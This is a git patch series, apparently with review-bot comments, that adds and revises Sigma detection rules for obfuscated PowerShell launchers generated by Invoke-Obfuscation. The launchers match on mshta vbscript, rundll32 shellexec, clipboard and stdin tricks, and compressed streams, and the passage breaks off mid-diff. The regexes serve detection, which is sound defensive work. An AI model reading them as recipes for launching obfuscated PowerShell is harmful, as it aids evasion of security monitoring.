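Review bot: The compress driver_load copy has an empty line inside the `detection:` block, between `detection:` and `selection:`; it parses, but no other rule in this commit has one. The new `win_invoke_obfuscation_clip+_services_security.yml` likewise inserts an empty line between the `tags` list and `logsource:`. Removing both keeps the files consistent with the project's other rules.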
diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml new file mode 100644 index 00000000..3ab2295d --- /dev/null +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml @@ -0,0 +1,27 @@ +title: Invoke-Obfuscation RUNDLL LAUNCHER +id: 03b024c6-aad1-4da5-9f60-e9e8c00fa64c +related: + - id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9 + type: derived +description: Detects Obfuscated Powershell via RUNDLL LAUNCHER +status: experimental +author: Timur Zinniatullin, oscd.community +date: 2020/10/18 +modified: 2021/09/18 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task 23) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + category: driver_load +detection: + selection: + ImagePath|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' + condition: selection +falsepositives: + - Unknown +level: medium \ No newline at end of file diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml new file mode 100644 index 00000000..cb3a4f6c --- /dev/null +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml 
@@ -0,0 +1,27 @@ +title: Invoke-Obfuscation Via Stdin +id: 82b66143-53ee-4369-ab02-de2c70cd6352 +related: + - id: 487c7524-f892-4054-b263-8a0ace63fc25 + type: derived +description: Detects Obfuscated Powershell via Stdin in Scripts +status: experimental +author: Nikita Nazarov, oscd.community +date: 2020/10/12 +modified: 2021/09/18 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task28) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + category: driver_load +detection: + selection: + ImagePath|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' + condition: selection +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml new file mode 100644 index 00000000..a305c28b --- /dev/null +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml @@ -0,0 +1,27 @@ +title: Invoke-Obfuscation Via Use Clip +id: 1fc02cb5-8acf-4d2c-bf9c-a28b6e0ad851 +related: + - id: 63e3365d-4824-42d8-8b82-e56810fefa0c + type: derived +description: Detects Obfuscated Powershell via use Clip.exe in Scripts +status: experimental +author: Nikita Nazarov, oscd.community +date: 2020/10/09 +modified: 2021/09/18 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task29) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + category: driver_load +detection: + selection: + ImagePath|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' + condition: selection +falsepositives: + - Unknown +level: high \ No newline at end of file 
diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml new file mode 100644 index 00000000..85dcade5 --- /dev/null +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml @@ -0,0 +1,27 @@ +title: Invoke-Obfuscation Via Use MSHTA +id: a4e82ad2-7430-4ee8-b858-6ad6099773fa +related: + - id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 + type: derived +description: Detects Obfuscated Powershell via use MSHTA in Scripts +status: experimental +author: Nikita Nazarov, oscd.community +date: 2020/10/09 +modified: 2021/09/18 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task31) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + category: driver_load +detection: + selection: + ImagePath|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' + condition: selection +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml new file mode 100644 index 00000000..16bd38f5 --- /dev/null +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml 
@@ -0,0 +1,27 @@
+title: Invoke-Obfuscation Via Use Rundll32
+id: 4e1518d9-2136-4015-ab49-c31d7c8588e1
+related:
+ - id: 641a4bfb-c017-44f7-800c-2aee0184ce9b
+ type: derived
+description: Detects Obfuscated Powershell via use Rundll32 in Scripts
+status: experimental
+author: Nikita Nazarov, oscd.community
+date: 2020/10/09
+modified: 2021/09/18
+references:
+ - https://github.com/Neo23x0/sigma/issues/1009 #(Task30)
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ product: windows
+ category: driver_load
+detection:
+ selection:
+ ImagePath|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"'
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
\ No newline at end of file
diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_var++_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_var++_services.yml
new file mode 100644
index 00000000..749214cf
--- /dev/null
+++ b/rules-unsupported/driver_load_invoke_obfuscation_via_var++_services.yml
@@ -0,0 +1,27 @@
+title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
+id: 7b9a650e-6788-4fdf-888d-ec7c0a62810d
+related:
+ - id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6
+ type: derived
+description: Detects Obfuscated Powershell via VAR++ LAUNCHER
+status: experimental
+author: Timur Zinniatullin, oscd.community
+date: 2020/10/13
+modified: 2021/09/18
+references:
+ - https://github.com/Neo23x0/sigma/issues/1009 #(Task27)
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ product: windows
+ category: driver_load
+detection:
+ selection:
+ ImagePath|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
\ No newline at end of file
diff --git a/rules/windows/builtin/win_invoke_obfuscation_clip+_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_clip+_services_security.yml
new file mode 100644
index 00000000..3437be16
--- /dev/null
+++ b/rules/windows/builtin/win_invoke_obfuscation_clip+_services_security.yml
@@ -0,0 +1,30 @@
+title: Invoke-Obfuscation CLIP+ Launcher
+id: 4edf51e1-cb83-4e1a-bc39-800e396068e3
+related:
+ - id: f7385ee2-0e0c-11eb-adc1-0242ac120002
+ type: derived
+description: Detects Obfuscated use of Clip.exe to execute PowerShell
+status: experimental
+author: Jonathan Cheong, oscd.community
+date: 2020/10/13
+modified: 2021/09/16
+references:
+ - https://github.com/Neo23x0/sigma/issues/1009 #(Task 26)
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+
+logsource:
+ product: windows
+ service: security
+detection:
+ selection_eventid:
+ EventID: 4697
+ selection:
+ ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"'
+ condition: selection and selection_eventid
+falsepositives:
+ - Unknown
+level: high
\ No newline at end of file
diff --git a/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services_security.yml
new file mode 100644
index 00000000..8f59c788
--- /dev/null
+++ b/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services_security.yml
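Review bot: Case handling of the `ImagePath|re` patterns is inconsistent across the new 4697 rules: this regex, like the ones in L1674 and L1675, has no `(?i)`, so whether `cmd` or `clip` matches `CMD` or `CLIP` depends on the target backend's regex defaults, while the rules from L1676 onward carry an inline `(?i)` that not every backend's regex engine accepts (Lucene-style `regexp` queries, for instance, have no inline flags). Pick one convention for the whole set and record it in a comment next to the pattern so a converter failure or a silent case-sensitive match is not a surprise later. The leading `.*` is also redundant for an unanchored search and only adds backtracking, so `'cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"'` is equivalent; the same holds for the patterns in L1674 through L1680.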
@@ -0,0 +1,31 @@
+title: Invoke-Obfuscation Obfuscated IEX Invocation
+id: fd0f5778-d3cb-4c9a-9695-66759d04702a
+related:
+ - id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9
+ type: derived
+description: "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888"
+status: experimental
+author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community
+date: 2019/11/08
+modified: 2021/09/16
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+logsource:
+ product: windows
+ service: security
+detection:
+ selection:
+ EventID: 4697
+ selection_1:
+ - ImagePath|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\['
+ - ImagePath|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\['
+ - ImagePath|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\['
+ - ImagePath|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}'
+ - ImagePath|re: '\\*mdr\*\W\s*\)\.Name'
+ - ImagePath|re: '\$VerbosePreference\.ToString\('
+ - ImagePath|re: '\String\]\s*\$VerbosePreference'
+ condition: selection and selection_1
+falsepositives:
+ - Unknown
+level: high
\ No newline at end of file
diff --git a/rules/windows/builtin/win_invoke_obfuscation_stdin+_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_stdin+_services_security.yml
new file mode 100644
index 00000000..92e539b6
--- /dev/null
+++ b/rules/windows/builtin/win_invoke_obfuscation_stdin+_services_security.yml
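Review bot: The last `selection_1` entry, `'\String\]\s*\$VerbosePreference'`, begins with `\S`, which is the non-whitespace character class rather than an escaped `S`, so the pattern reads as "any non-space character followed by `tring]`"; it still matches `String]` but is looser than it looks and reads as a typo, and `'String\]\s*\$VerbosePreference'` is presumably what was meant. Likewise `'\\*mdr\*\W\s*\)\.Name'` starts with `\\*`, zero or more literal backslashes (YAML single quotes do not process escapes), where a literal asterisk, `'\*mdr\*\W\s*\)\.Name'`, appears intended given the `\*` at the other end. The rename in L1682 carries both patterns forward unchanged, so it is worth fixing in the same pass.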
@@ -0,0 +1,29 @@
+title: Invoke-Obfuscation STDIN+ Launcher
+id: 0c718a5e-4284-4fb9-b4d9-b9a50b3a1974
+related:
+ - id: 72862bf2-0eb1-11eb-adc1-0242ac120002
+ type: derived
+description: Detects Obfuscated use of stdin to execute PowerShell
+status: experimental
+author: Jonathan Cheong, oscd.community
+date: 2020/10/15
+modified: 2021/09/17
+references:
+ - https://github.com/Neo23x0/sigma/issues/1009 #(Task 25)
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ product: windows
+ service: security
+detection:
+ selection_eventid:
+ EventID: 4697
+ selection:
+ ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"'
+ condition: selection and selection_eventid
+falsepositives:
+ - Unknown
+level: high
\ No newline at end of file
diff --git a/rules/windows/builtin/win_invoke_obfuscation_var+_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_var+_services_security.yml
new file mode 100644
index 00000000..de9ff35a
--- /dev/null
+++ b/rules/windows/builtin/win_invoke_obfuscation_var+_services_security.yml
@@ -0,0 +1,30 @@
+title: Invoke-Obfuscation VAR+ Launcher
+id: dcf2db1f-f091-425b-a821-c05875b8925a
+related:
+ - id: 8ca7004b-e620-4ecb-870e-86129b5b8e75
+ type: derived
+description: Detects Obfuscated use of Environment Variables to execute PowerShell
+status: experimental
+author: Jonathan Cheong, oscd.community
+date: 2020/10/15
+modified: 2021/09/17
+references:
+ - https://github.com/Neo23x0/sigma/issues/1009 #(Task 24)
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ product: windows
+ service: security
+detection:
+ selection_eventid:
+ EventID: 4697
+ selection:
+ ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"'
+ condition: all of them
+falsepositives:
+ - Unknown
+level: high
+
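Review bot: `condition: all of them` in the VAR+ rule is the only one of these 4697 rules not written as `selection and selection_eventid`; it is equivalent today, but it silently changes meaning the moment a `filter` selection is added to the rule, so `condition: selection and selection_eventid` keeps it safe and consistent with its siblings (the STDIN+ rule in the same line, L1673, L1676). In the same regex, `(?:\s|)` is an empty-alternative spelling of `\s?`, and `(?:\{\d\}){1,}` of `(?:\{\d\})+`; both are worth simplifying so the next reader does not have to puzzle over them.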
diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_compress_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_compress_services_security.yml
new file mode 100644
index 00000000..fef655aa
--- /dev/null
+++ b/rules/windows/builtin/win_invoke_obfuscation_via_compress_services_security.yml
@@ -0,0 +1,29 @@
+title: Invoke-Obfuscation COMPRESS OBFUSCATION
+id: 7a922f1b-2635-4d6c-91ef-af228b198ad3
+related:
+ - id: 175997c5-803c-4b08-8bb0-70b099f47595
+ type: derived
+description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
+status: experimental
+author: Timur Zinniatullin, oscd.community
+date: 2020/10/18
+modified: 2021/09/18
+references:
+ - https://github.com/Neo23x0/sigma/issues/1009 #(Task 19)
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ product: windows
+ service: security
+detection:
+ selection_eventid:
+ EventID: 4697
+ selection:
+ ImagePath|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend'
+ condition: selection and selection_eventid
+falsepositives:
+ - unknown
+level: medium
\ No newline at end of file
diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services_security.yml
new file mode 100644
index 00000000..a180e633
--- /dev/null
+++ b/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services_security.yml
@@ -0,0 +1,29 @@
+title: Invoke-Obfuscation RUNDLL LAUNCHER
+id: f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca
+related:
+ - id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9
+ type: derived
+description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
+status: experimental
+author: Timur Zinniatullin, oscd.community
+date: 2020/10/18
+modified: 2021/09/18
+references:
+ - https://github.com/Neo23x0/sigma/issues/1009 #(Task 23)
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ product: windows
+ service: security
+detection:
+ selection_eventid:
+ EventID: 4697
+ selection:
+ ImagePath|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"'
+ condition: selection and selection_eventid
+falsepositives:
+ - Unknown
+level: medium
diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services_security.yml
new file mode 100644
index 00000000..47e0c6e9
--- /dev/null
+++ b/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services_security.yml
@@ -0,0 +1,29 @@
+title: Invoke-Obfuscation Via Stdin
+id: 80b708f3-d034-40e4-a6c8-d23b7a7db3d1
+related:
+ - id: 487c7524-f892-4054-b263-8a0ace63fc25
+ type: derived
+description: Detects Obfuscated Powershell via Stdin in Scripts
+status: experimental
+author: Nikita Nazarov, oscd.community
+date: 2020/10/12
+modified: 2021/09/18
+references:
+ - https://github.com/Neo23x0/sigma/issues/1009 #(Task28)
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ product: windows
+ service: security
+detection:
+ selection_eventid:
+ EventID: 4697
+ selection:
+ ImagePath|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"'
+ condition: selection and selection_eventid
+falsepositives:
+ - Unknown
+level: high
\ No newline at end of file
diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services_security.yml
new file mode 100644
index 00000000..6fa79061
--- /dev/null
+++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services_security.yml
@@ -0,0 +1,31 @@
+title: Invoke-Obfuscation Via Use Clip
+id: 1a0a2ff1-611b-4dac-8216-8a7b47c618a6
+related:
+ - id: 63e3365d-4824-42d8-8b82-e56810fefa0c
+ type: derived
+description: Detects Obfuscated Powershell via use Clip.exe in Scripts
+status: experimental
+author: Nikita Nazarov, oscd.community
+date: 2020/10/09
+modified: 2021/09/18
+references:
+ - https://github.com/Neo23x0/sigma/issues/1009 #(Task29)
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ product: windows
+ service: security
+detection:
+ selection_eventid:
+ EventID: 4697
+ selection:
+ ImagePath|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*'
+ condition: selection and selection_eventid
+falsepositives:
+ - Unknown
+level: high
+
+
diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services_security.yml
new file mode 100644
index 00000000..6f66d4fd
--- /dev/null
+++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services_security.yml
@@ -0,0 +1,29 @@
+title: Invoke-Obfuscation Via Use MSHTA
+id: 9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a
+related:
+ - id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4
+ type: derived
+description: Detects Obfuscated Powershell via use MSHTA in Scripts
+status: experimental
+author: Nikita Nazarov, oscd.community
+date: 2020/10/09
+modified: 2021/09/18
+references:
+ - https://github.com/Neo23x0/sigma/issues/1009 #(Task31)
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ product: windows
+ service: security
+detection:
+ selection_eventid:
+ EventID: 4697
+ selection:
+ ImagePath|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"'
+ condition: selection and selection_eventid
+falsepositives:
+ - Unknown
+level: high
\ No newline at end of file
diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services_security.yml
new file mode 100644
index 00000000..18e9fb4e
--- /dev/null
+++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services_security.yml
@@ -0,0 +1,29 @@
+title: Invoke-Obfuscation Via Use Rundll32
+id: cd0f7229-d16f-42de-8fe3-fba365fbcb3a
+related:
+ - id: 641a4bfb-c017-44f7-800c-2aee0184ce9b
+ type: derived
+description: Detects Obfuscated Powershell via use Rundll32 in Scripts
+status: experimental
+author: Nikita Nazarov, oscd.community
+date: 2020/10/09
+modified: 2021/09/18
+references:
+ - https://github.com/Neo23x0/sigma/issues/1009 #(Task30)
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ product: windows
+ service: security
+detection:
+ selection_eventid:
+ EventID: 4697
+ selection:
+ ImagePath|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"'
+ condition: selection and selection_eventid
+falsepositives:
+ - Unknown
+level: high
\ No newline at end of file
diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_var++_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_var++_services_security.yml
new file mode 100644
index 00000000..51bbebc9
--- /dev/null
+++ b/rules/windows/builtin/win_invoke_obfuscation_via_var++_services_security.yml
@@ -0,0 +1,29 @@
+title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
+id: 4c54ba8f-73d2-4d40-8890-d9cf1dca3d30
+related:
+ - id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6
+ type: derived
+description: Detects Obfuscated Powershell via VAR++ LAUNCHER
+status: experimental
+author: Timur Zinniatullin, oscd.community
+date: 2020/10/13
+modified: 2021/09/18
+references:
+ - https://github.com/Neo23x0/sigma/issues/1009 #(Task27)
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ product: windows
+ service: security
+detection:
+ selection_eventid:
+ EventID: 4697
+ selection:
+ ImagePath|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r
+ condition: selection and selection_eventid
+falsepositives:
+ - Unknown
+level: high
\ No newline at end of file
From 10d11b7890d3b834f6fb3e93421d494d5e6bc1b5 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 20 Sep 2021 22:53:59 +0200 Subject: [PATCH 0998/1367] fix 4697 fieldname --- ..._invoke_obfuscation_clip+_services_security.yml | 2 +- ...bfuscation_obfuscated_iex_services_security.yml | 14 +++++++------- ...invoke_obfuscation_stdin+_services_security.yml | 2 +- ...n_invoke_obfuscation_var+_services_security.yml | 2 +- ..._obfuscation_via_compress_services_security.yml | 2 +- ...ke_obfuscation_via_rundll_services_security.yml | 2 +- ...oke_obfuscation_via_stdin_services_security.yml | 2 +- ..._obfuscation_via_use_clip_services_security.yml | 2 +- ...obfuscation_via_use_mshta_services_security.yml | 2 +- ...uscation_via_use_rundll32_services_security.yml | 2 +- ...oke_obfuscation_via_var++_services_security.yml | 2 +- 11 files changed, 17 insertions(+), 17 deletions(-) diff --git a/rules/windows/builtin/win_invoke_obfuscation_clip+_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_clip+_services_security.yml index 3437be16..78e39d46 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_clip+_services_security.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_clip+_services_security.yml @@ -23,7 +23,7 @@ detection: selection_eventid: EventID: 4697 selection: - ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' + ServiceFileName|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' condition: selection and selection_eventid falsepositives: - Unknown diff --git a/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services_security.yml index 8f59c788..043bcf55 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services_security.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services_security.yml 
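Review bot: The rename from `ImagePath` to `ServiceFileName` changes what the rule matches but leaves `modified: 2021/09/16` untouched (the date sits just above this hunk; it is visible in the file as created in L1673). The other edits on this page bump `modified` whenever detection content changes (for example `+modified: 2021/09/21` in L1687 and L1689), so these eleven files should get the same bump to keep downstream consumers' change tracking honest. The same applies to the hunks in L1682, L1683, L1684 and L1685.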
@@ -18,13 +18,13 @@ detection: selection: EventID: 4697 selection_1: - - ImagePath|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[' - - ImagePath|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' - - ImagePath|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[' - - ImagePath|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}' - - ImagePath|re: '\\*mdr\*\W\s*\)\.Name' - - ImagePath|re: '\$VerbosePreference\.ToString\(' - - ImagePath|re: '\String\]\s*\$VerbosePreference' + - ServiceFileName|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[' + - ServiceFileName|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' + - ServiceFileName|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[' + - ServiceFileName|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}' + - ServiceFileName|re: '\\*mdr\*\W\s*\)\.Name' + - ServiceFileName|re: '\$VerbosePreference\.ToString\(' + - ServiceFileName|re: '\String\]\s*\$VerbosePreference' condition: selection and selection_1 falsepositives: - Unknown diff --git a/rules/windows/builtin/win_invoke_obfuscation_stdin+_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_stdin+_services_security.yml index 92e539b6..4e7bc9f1 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_stdin+_services_security.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_stdin+_services_security.yml @@ -22,7 +22,7 @@ detection: selection_eventid: EventID: 4697 selection: - ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' + ServiceFileName|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' condition: selection and selection_eventid falsepositives: - Unknown diff --git a/rules/windows/builtin/win_invoke_obfuscation_var+_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_var+_services_security.yml index de9ff35a..8b6aec83 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_var+_services_security.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_var+_services_security.yml 
@@ -22,7 +22,7 @@ detection: selection_eventid: EventID: 4697 selection: - ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' + ServiceFileName|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' condition: all of them falsepositives: - Unknown diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_compress_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_compress_services_security.yml index fef655aa..e8e46fbc 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_compress_services_security.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_compress_services_security.yml @@ -22,7 +22,7 @@ detection: selection_eventid: EventID: 4697 selection: - ImagePath|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' + ServiceFileName|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' condition: selection and selection_eventid falsepositives: - unknown diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services_security.yml index a180e633..ac9023d7 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services_security.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services_security.yml @@ -22,7 +22,7 @@ detection: selection_eventid: EventID: 4697 selection: - ImagePath|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' + ServiceFileName|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' condition: selection and selection_eventid falsepositives: - Unknown 
diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services_security.yml index 47e0c6e9..002cd3f5 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services_security.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services_security.yml @@ -22,7 +22,7 @@ detection: selection_eventid: EventID: 4697 selection: - ImagePath|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' + ServiceFileName|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' condition: selection and selection_eventid falsepositives: - Unknown diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services_security.yml index 6fa79061..5ee720c6 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services_security.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services_security.yml @@ -22,7 +22,7 @@ detection: selection_eventid: EventID: 4697 selection: - ImagePath|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' + ServiceFileName|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' condition: selection and selection_eventid falsepositives: - Unknown diff --git 